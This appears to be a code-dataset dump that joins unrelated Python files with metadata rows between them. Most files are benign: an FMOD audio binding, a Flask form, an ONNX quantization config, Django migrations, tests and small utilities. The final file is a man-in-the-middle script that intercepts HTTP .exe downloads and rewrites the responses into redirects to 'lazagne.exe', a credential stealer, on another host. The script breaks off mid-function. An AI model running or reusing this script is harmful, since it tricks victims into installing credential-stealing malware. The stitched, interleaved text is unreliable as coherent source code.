:type curve: A list of something that can be treated as a list of [x, y, z] values e.g. implements indexing in some way.
"""
native_curve = (VECTOR * len(curve))(*[VECTOR.from_list(lst) for lst in curve])
self._call_fmod("FMOD_Sound_Set3DCustomRolloff", native_curve, len(native_curve))
@property
def _min_max_distance(self):
min = c_float()
max = c_float()
ckresult(_dll.FMOD_Sound_Get3DMinMaxDistance(self._ptr, byref(min), byref(max)))
return (min.value, max.value)
@_min_max_distance.setter
def _min_max_distance(self, dists):
ckresult(_dll.FMOD_Sound_Set3DMinMaxDistance(self._ptr, c_float(dists[0]), c_float(dists[1])))
@property
def min_distance(self):
return self._min_max_distance[0]
@min_distance.setter
def min_distance(self, dist):
self._min_max_distance = (dist, self._min_max_distance[1])
@property
def max_distance(self):
return self._min_max_distance[1]
@max_distance.setter
def max_distance(self, dist):
self._min_max_distance = (self._min_max_distance[0], dist)
@property
def _defaults(self):
freq = c_float()
vol = c_float()
pan = c_float()
pri = c_int()
ckresult(_dll.FMOD_Sound_GetDefaults(self._ptr, byref(freq), byref(vol), byref(pan), byref(pri)))
return [freq.value, vol.value, pan.value, pri.value]
@_defaults.setter
def _defaults(self, vals):
ckresult(_dll.FMOD_Sound_SetDefaults(self._ptr, c_float(vals[0]), c_float(vals[1]), c_float(vals[2]), vals[3]))
@property
def default_frequency(self):
return self._defaults[0]
@default_frequency.setter
def default_frequency(self, freq):
d = self._defaults
d[0] = freq
self._defaults = d
@property
def default_volume(self):
return self._defaults[1]
@default_volume.setter
def default_volume(self, vol):
d = self._defaults
d[1] = vol
self._defaults = d
@property
def default_pan(self):
return self._defaults[2]
@default_pan.setter
def default_pan(self, pan):
d = self._defaults
d[2] = pan
self._defaults = d
@property
def default_priority(self):
return self._defaults[3]
@default_priority.setter
def default_priority(self, pri):
d = self._defaults
d[3] = pri
self._defaults = d
@property
def format(self):
type = c_int()
format = c_int()
bits = c_int()
ckresult(_dll.FMOD_Sound_GetFormat(self._ptr, byref(type), byref(format), byref(bits)))
return so(type=type.value, format=format.value, bits=bits.value)
def get_length(self, ltype):
len = c_uint()
ckresult(_dll.FMOD_Sound_GetLength(self._ptr, byref(len), ltype))
return len.value
@property
def loop_count(self):
c = c_int()
ckresult(_dll.FMOD_Sound_GetLoopCount(self._ptr, byref(c)))
return c.value
@loop_count.setter
def loop_count(self, count):
ckresult(_dll.FMOD_Sound_SetLoopCount(self._ptr, count))
@property
def loop_points(self):
"""Returns tuple of two tuples ((start, startunit),(end, endunit))"""
start = c_uint()
startunit = c_int()
end = c_uint()
endunit = c_int()
ckresult(_dll.FMOD_Sound_GetLoopPoints(self._ptr, byref(start), byref(startunit), byref(end), byref(endunit)))
return ((start.value, startunit.value), (end.value, endunit.value))
@loop_points.setter
def loop_points(self, p):
"""Same format as returned from this property is required to successfully call this setter."""
ckresult(_dll.FMOD_Sound_SetLoopPoints(self._ptr, p[0][0], p[0][1], p[1][0], p[1][1]))
@property
def mode(self):
mode = c_int()
ckresult(_dll.FMOD_Sound_GetMode(self._ptr, byref(mode)))
return mode.value
@mode.setter
def mode(self, m):
ckresult(_dll.FMOD_Sound_SetMode(self._ptr, m))
def get_music_channel_volume(self, channel):
v = c_float()
ckresult(_dll.FMOD_Sound_GetMusicChannelVolume(self._ptr, channel, byref(v)))
return v.value
def set_music_channel_volume(self, id, vol):
ckresult(_dll.FMOD_Sound_SetMusicChannelVolume(self._ptr, id, c_float(vol)))
@property
def num_music_channels(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetMusicNumChannels(self._ptr, byref(num)))
return num.value
@property
def name(self):
name = create_string_buffer(256)
ckresult(_dll.FMOD_Sound_GetName(self._ptr, byref(name), 256))
return name.value
@property
def num_subsounds(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumSubSounds(self._ptr, byref(num)))
return num.value
@property
def num_sync_points(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumSyncPoints(self._ptr, byref(num)))
return num.value
@property
def num_tags(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumTags(self._ptr, byref(num)))
return num.value
@property
def open_state(self):
state = c_int()
percentbuffered = c_uint()
starving = c_bool()
diskbusy = c_bool()
ckresult(_dll.FMOD_Sound_GetOpenState(self._ptr, byref(state), byref(percentbuffered), byref(starving),
byref(diskbusy)))
return so(state=state.value, percent_buffered=percentbuffered.value, starving=starving.value,
disk_busy=diskbusy.value)
@property
def sound_group(self):
grp_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSoundGroup(self._ptr, byref(grp_ptr)))
return get_class("SoundGroup")(grp_ptr)
@sound_group.setter
def sound_group(self, group):
check_type(group, get_class("SoundGroup"))
ckresult(_dll.FMOD_Sound_SetSoundGroup(self._ptr, group._ptr))
def get_subsound(self, index):
sh_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSubSound(self._ptr, index, byref(sh_ptr)))
return Sound(sh_ptr)
def get_sync_point(self, index):
sp = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPoint(self._ptr, index, byref(sp)))
return sp.value
def get_sync_point_info(self, point):
name = c_char_p()
offset = c_uint()
offsettype = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPointInfo(self._ptr, point, byref(name), 256, byref(offset), byref(offsettype)))
return so(name=name.value, offset=offset.value, offset_type=offsettype.value)
@property
def system_object(self):
sptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSystemObject(self._ptr, byref(sptr)))
return get_class("System")(sptr, False)
def play(self, paused=False):
return self.system_object.play_sound(self, paused)
def get_tag(self, index, name=None):
tag = TAG()
ckresult(_dll.FMOD_Sound_GetTag(self._ptr, name, index, byref(tag)))
return tag
@property
def _variations(self):
freq = c_float()
vol = c_float()
pan = c_float()
ckresult(_dll.FMOD_Sound_GetVariations(self._ptr, byref(freq), byref(vol), byref(pan)))
return [freq.value, vol.value, pan.value]
@_variations.setter
def _variations(self, vars):
ckresult(_dll.FMOD_Sound_SetVariations(self._ptr, c_float(vars[0]), c_float(vars[1]), c_float(vars[2])))
@property
def frequency_variation(self):
return self._variations[0]
@frequency_variation.setter
def frequency_variation(self, var):
v = self._variations
v[0] = var
self._variations = var
@property
def volume_variation(self):
return self._variations[1]
@volume_variation.setter
def volume_variation(self, var):
v = self._variations
v[1] = var
self._variations = var
@property
def pan_variation(self):
return self._variations[2]
@pan_variation.setter
def pan_variation(self, var):
v = self._variations
v[2] = var
self._variations = var
def lock(self, offset, length):
ptr1 = c_void_p()
len1 = c_uint()
ptr2 = c_void_p()
len2 = c_uint()
ckresult(_dll.FMOD_Sound_Lock(self._ptr, offset, length, byref(ptr1), byref(ptr2), byref(len1), byref(len2)))
return ((ptr1, len1), (ptr2, len2))
def release(self):
ckresult(_dll.FMOD_Sound_Release(self._ptr))
def set_subsound(self, index, snd):
check_type(snd, Sound)
ckresult(_dll.FMOD_Sound_SetSubSound(self._ptr, index, snd._ptr))
def set_subsound_sentence(self, sounds):
a = c_int * len(sounds)
ptrs = [o._ptr for o in sounds]
ai = a(*ptrs)
ckresult(_dll.FMOD_Sound_SetSubSoundSentence(self._ptr, ai, len(ai)))
def unlock(self, i1, i2):
"""I1 and I2 are tuples of form (ptr, len)."""
ckresult(_dll.FMOD_Sound_Unlock(self._ptr, i1[0], i2[0], i1[1], i2[1]))
@property
def music_speed(self):
speed = c_float()
self._call_fmod("FMOD_Sound_GetMusicSpeed", byref(speed))
return speed.value
@music_speed.setter
def music_speed(self, speed):
self._call_fmod("FMOD_Sound_SetMusicSpeed", c_float(speed))
def read_data(self, length):
"""Read a fragment of the sound's decoded data.
:param length: The requested length.
:returns: The data and the actual length.
:rtype: Tuple of the form (data, actual)."""
buf = create_string_buffer(length)
actual = c_uint()
self._call_fmod("FMOD_Sound_ReadData", buf, length, byref(actual))
return buf.value, actual.value
def seek_data(self, offset):
"""Seeks for data reading purposes.
:param offset: The offset to seek to in PCM samples.
:type offset: Int or long, but must be in range of an unsigned long, not python's arbitrary long."""
self._call_fmod("FMOD_Sound_SeekData", offset) | 31.745501 | 128 | 0.639809 | 1,617 | 12,349 | 4.611008 | 0.155844 | 0.054319 | 0.076449 | 0.101931 | 0.252548 | 0.195279 | 0.121647 | 0.078192 | 0.030848 | 0.020118 | 0 | 0.008162 | 0.246012 | 12,349 | 389 | 129 | 31.745501 | 0.792611 | 0.064297 | 0 | 0.206667 | 0 | 0 | 0.017398 | 0.011803 | 0 | 0 | 0 | 0 | 0 | 1 | 0.233333 | false | 0 | 0.013333 | 0.046667 | 0.386667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46725864f7a8f29464ea63af729e3e78c2a1218d | 370 | py | Python | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | GreenMoon/forms.py | ma010/green-moon | 25ed395f1e19c180995b22508143c8819bf40fae | [
"CNRI-Python"
] | null | null | null | """
Implement a class function for user to put in a zip-code and
search relevant information about business entities in that zip-code area.
"""
from flask.ext.wtf import Form
from wtforms import StringField, BooleanField
from wtforms.validators import DataRequired
class inputZipForm(Form):
inputZip = StringField('inputZip', validators=[DataRequired()])
| 28.461538 | 78 | 0.77027 | 48 | 370 | 5.9375 | 0.6875 | 0.049123 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156757 | 370 | 12 | 79 | 30.833333 | 0.913462 | 0.364865 | 0 | 0 | 0 | 0 | 0.036697 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
467742b9ee49da3193dfeffba9fb6976ebe7eb72 | 2,391 | py | Python | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 136 | 2020-06-01T14:03:31.000Z | 2020-10-28T06:10:50.000Z | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 133 | 2020-05-26T13:48:04.000Z | 2020-10-28T05:25:55.000Z | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 36 | 2020-05-28T08:18:39.000Z | 2020-10-27T14:46:58.000Z | """
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from nncf.common.quantization.quantizer_propagation.structs import QuantizationTrait
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConvolutionMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXLinearMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXHardSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXGlobalAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAddLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXMulLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConcatLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXBatchNormMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXResizeMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSoftmaxMetatype
from nncf.common.graph.operator_metatypes import UnknownMetatype
DEFAULT_ONNX_QUANT_TRAIT_TO_OP_DICT = {
QuantizationTrait.INPUTS_QUANTIZABLE: [
ONNXConvolutionMetatype,
ONNXLinearMetatype,
ONNXAveragePoolMetatype,
ONNXGlobalAveragePoolMetatype,
ONNXAddLayerMetatype,
ONNXMulLayerMetatype,
ONNXBatchNormMetatype,
ONNXHardSigmoidMetatype,
ONNXResizeMetatype,
],
QuantizationTrait.NON_QUANTIZABLE: [ONNXSigmoidMetatype,
ONNXSoftmaxMetatype,
UnknownMetatype],
QuantizationTrait.CONCAT: [ONNXConcatLayerMetatype],
QuantizationTrait.OUTPUT_QUANTIZATION_AS_WEIGHTS: []
}
| 49.8125 | 89 | 0.79632 | 261 | 2,391 | 7.199234 | 0.394636 | 0.059606 | 0.127728 | 0.153273 | 0.325705 | 0.325705 | 0.325705 | 0.325705 | 0.325705 | 0 | 0 | 0.003929 | 0.148473 | 2,391 | 47 | 90 | 50.87234 | 0.918959 | 0.233793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4375 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4677cd39827e65c98f0ade72fd58eb0f79b2c0cc | 671 | py | Python | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | 3 | 2019-08-02T21:02:47.000Z | 2021-09-08T13:59:43.000Z | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | null | null | null | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# michael a.g. aïvázis
# orthologue
# (c) 1998-2019 all rights reserved
#
# declaration
class Chain:
"""
A locator that ties together two others in order to express that something in {next}
caused {this} to be recorded
"""
# meta methods
def __init__(self, this, next):
self.this = this
self.next = next
return
def __str__(self):
# if {next} is non-trivial, show the chain
if self.next: return "{0.this}, {0.next}".format(self)
# otherwise don't
return "{0.this}".format(self)
# implementation details
__slots__ = "this", "next"
# end of file
| 18.638889 | 88 | 0.593145 | 88 | 671 | 4.386364 | 0.647727 | 0.041451 | 0.056995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025052 | 0.28614 | 671 | 35 | 89 | 19.171429 | 0.780793 | 0.47541 | 0 | 0 | 0 | 0 | 0.105919 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46820f0e1937a8a50c1292d89054f263875a439f | 686 | py | Python | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | 1 | 2019-04-22T06:08:13.000Z | 2019-04-22T06:08:13.000Z | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | null | null | null | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
import nmrglue as ng
# read in the varian data
dic,data = ng.pipe.read("../common_data/2d_pipe/test.ft2")
# Set the parameters
u = ng.pipe.guess_udic(dic,data)
# create the converter object and initilize with varian data
C = ng.convert.converter()
C.from_pipe(dic,data,u)
# create pipe data and then write it out
ng.sparky.write("2d_sparky.ucsf",*C.to_sparky(),overwrite=True)
# check the conversion against NMRPipe
print "Conversion complete, listing differences between files:"
sdic,sdata = ng.sparky.read("2d_sparky.ucsf")
sdic2,sdata2 = ng.sparky.read("../common_data/2d_sparky/data.ucsf")
print ng.misc.pair_similar(sdic,sdata,sdic2,sdata2,verb=True)
| 29.826087 | 67 | 0.759475 | 114 | 686 | 4.482456 | 0.526316 | 0.041096 | 0.054795 | 0.062622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01473 | 0.109329 | 686 | 22 | 68 | 31.181818 | 0.821604 | 0.291545 | 0 | 0 | 0 | 0 | 0.308333 | 0.135417 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46830865694c3242ec731476bef2c0bab11ffa36 | 420 | py | Python | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | 85 | 2020-07-24T00:04:28.000Z | 2022-02-10T10:35:15.000Z | ufdl-core-app/src/ufdl/core_app/exceptions/_BadSource.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | from rest_framework import status
from rest_framework.exceptions import APIException
class BadSource(APIException):
    """Raised when a lazily-loaded data source can't be accessed for some reason."""

    status_code = status.HTTP_417_EXPECTATION_FAILED
    default_code = 'bad_source'

    def __init__(self, source: str, reason: str):
        detail = f"Bad source '{source}': {reason}"
        super().__init__(detail)
| 28 | 60 | 0.719048 | 54 | 420 | 5.296296 | 0.666667 | 0.055944 | 0.118881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008824 | 0.190476 | 420 | 14 | 61 | 30 | 0.832353 | 0.190476 | 0 | 0 | 0 | 0 | 0.128125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4686dbf11ea2488f7a45d2ed0c1748432a5a0064 | 394 | py | Python | profiles/migrations/0018_auto_20180514_2106.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | 2 | 2018-12-03T09:19:31.000Z | 2020-02-11T15:32:12.000Z | {{cookiecutter.project_slug}}/profiles/migrations/0018_auto_20180514_2106.py | brentfraser/cookiecutter-geopaparazzi-server | f9cd705991879deac67365007e9589142afc09bf | [
"BSD-3-Clause"
] | 2 | 2019-02-20T17:50:55.000Z | 2019-02-21T15:19:51.000Z | profiles/migrations/0018_auto_20180514_2106.py | GeoAnalytic-code/geotabloid | af017d470ef4553d5fbd24d865cb22ca643fd999 | [
"MIT"
] | 2 | 2018-10-19T17:07:01.000Z | 2021-01-13T06:54:55.000Z | # Generated by Django 2.0.3 on 2018-05-14 21:06
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: changes Project.url into a FileField that
    # uploads under 'projects/'.

    dependencies = [
        ('profiles', '0017_otherfiles_location'),
    ]

    operations = [
        migrations.AlterField(
            model_name='project',
            name='url',
            field=models.FileField(upload_to='projects/'),
        ),
    ]
| 20.736842 | 58 | 0.598985 | 41 | 394 | 5.658537 | 0.853659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067138 | 0.281726 | 394 | 18 | 59 | 21.888889 | 0.75265 | 0.114213 | 0 | 0 | 1 | 0 | 0.146974 | 0.069164 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4688b12d1b22b922d562bb53aed309b70230470c | 294 | py | Python | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.2 on 2020-03-29 19:11
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: removes the Dog model from hitchhikeapp.

    dependencies = [
        ('hitchhikeapp', '0010_userdata_userid'),
    ]

    operations = [
        migrations.DeleteModel(
            name='Dog',
        ),
    ]
| 17.294118 | 49 | 0.602041 | 31 | 294 | 5.645161 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090476 | 0.285714 | 294 | 16 | 50 | 18.375 | 0.742857 | 0.153061 | 0 | 0 | 1 | 0 | 0.1417 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4689fd0a503a48da1fc4fb1000e346ebf2f7be93 | 605 | py | Python | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 7 | 2020-05-07T08:13:44.000Z | 2021-12-17T07:33:51.000Z | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 17 | 2019-11-29T23:17:26.000Z | 2020-12-20T15:47:17.000Z | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 1 | 2020-12-17T22:44:21.000Z | 2020-12-17T22:44:21.000Z | from hypothesis import given
from tests.port_tests.hints import (PortedBoundingBox,
PortedPoint)
from tests.utils import equivalence
from . import strategies
@given(strategies.points)
def test_basic(point: PortedPoint) -> None:
    # A point's bounding box is always of the ported bounding-box type.
    assert isinstance(point.bounding_box, PortedBoundingBox)
@given(strategies.points, strategies.points)
def test_bijection(first_point: PortedPoint,
                   second_point: PortedPoint) -> None:
    # Two points are equal exactly when their bounding boxes are equal.
    assert equivalence(first_point == second_point,
                       first_point.bounding_box == second_point.bounding_box)
| 31.842105 | 77 | 0.707438 | 64 | 605 | 6.5 | 0.390625 | 0.115385 | 0.115385 | 0.110577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.219835 | 605 | 18 | 78 | 33.611111 | 0.881356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.153846 | false | 0 | 0.307692 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
468d721e5802a550fe36c1b0efccab7310faf51c | 697 | py | Python | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | from ._utils import construct_dia, construct_hth, construct_sampling_matrix
from .bsgda import bsgda, computing_sets, recon_bsgda, solving_set_covering
from .ess import ess, ess_sampling, recon_ess
from .fastgsss import fastgsss, recon_fastssss
from .rsbs import cheby_coeff4ideal_band_pass, estimate_lk, recon_rsbs, rsbs
# Public API of the sampling subpackage.
__all__ = [
    "ess",
    "ess_sampling",
    "bsgda",
    "computing_sets",
    "solving_set_covering",
    "cheby_coeff4ideal_band_pass",
    "estimate_lk",
    "rsbs",
    "fastgsss",
    # reconstruction
    "recon_fastssss",
    "recon_bsgda",
    "recon_ess",
    "recon_rsbs",
    # utils
    "construct_sampling_matrix",
    "construct_hth",
    "construct_dia",
]
| 25.814815 | 76 | 0.71736 | 82 | 697 | 5.646341 | 0.329268 | 0.051836 | 0.090713 | 0.103672 | 0.146868 | 0.146868 | 0 | 0 | 0 | 0 | 0 | 0.003515 | 0.183644 | 697 | 26 | 77 | 26.807692 | 0.810193 | 0.028694 | 0 | 0 | 0 | 0 | 0.295252 | 0.077151 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.086957 | 0.217391 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4690da1c3b97e01a8795122d75752b424704a346 | 1,706 | py | Python | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
# TCP ack numbers of .exe requests whose responses we intend to replace.
ack_list = []


def set_load(packet, load):
    # Replace the TCP payload, and delete the IP length and the IP/TCP
    # checksums so scapy recomputes them when the packet is serialized.
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet
# --- Configuration (was inline "#CHOOSE PORT HERE" / "#Input IP" comment
# placeholders embedded in the middle of expressions, which made this
# function a syntax error) ---
HTTP_PORT = 80  # 80 for plain HTTP; 10000 when traffic goes via sslstrip
WEBSERVER_IP = b"10.0.2.15"  # our web server - don't intercept our own file
# Redirect served instead of the original .exe download.
REDIRECT_PAYLOAD = (b"HTTP/1.1 301 Moved Permanently\n"
                    b"Location: http://10.0.2.15/Evil%20Files/lazagne.exe\n\n")


def process_packet(packet):
    """Modify downloaded files on the fly while the target uses HTTP.

    Watches requests for .exe files, remembers their TCP ack numbers, and
    rewrites the matching responses into a redirect to our payload.
    Accepts every packet (modified or not) back into the queue.
    """
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        load = scapy_packet[scapy.Raw].load
        if scapy_packet[scapy.TCP].dport == HTTP_PORT:
            # Request: note the ack of .exe downloads, except our own server's.
            if b".exe" in load and WEBSERVER_IP not in load:
                print("Captured .exe file in the Request packet.")
                ack_list.append(scapy_packet[scapy.TCP].ack)
        elif scapy_packet[scapy.TCP].sport == HTTP_PORT:
            # Response: if it answers a captured request, swap the body.
            if scapy_packet[scapy.TCP].seq in ack_list:
                ack_list.remove(scapy_packet[scapy.TCP].seq)
                print("Replacing the file.")
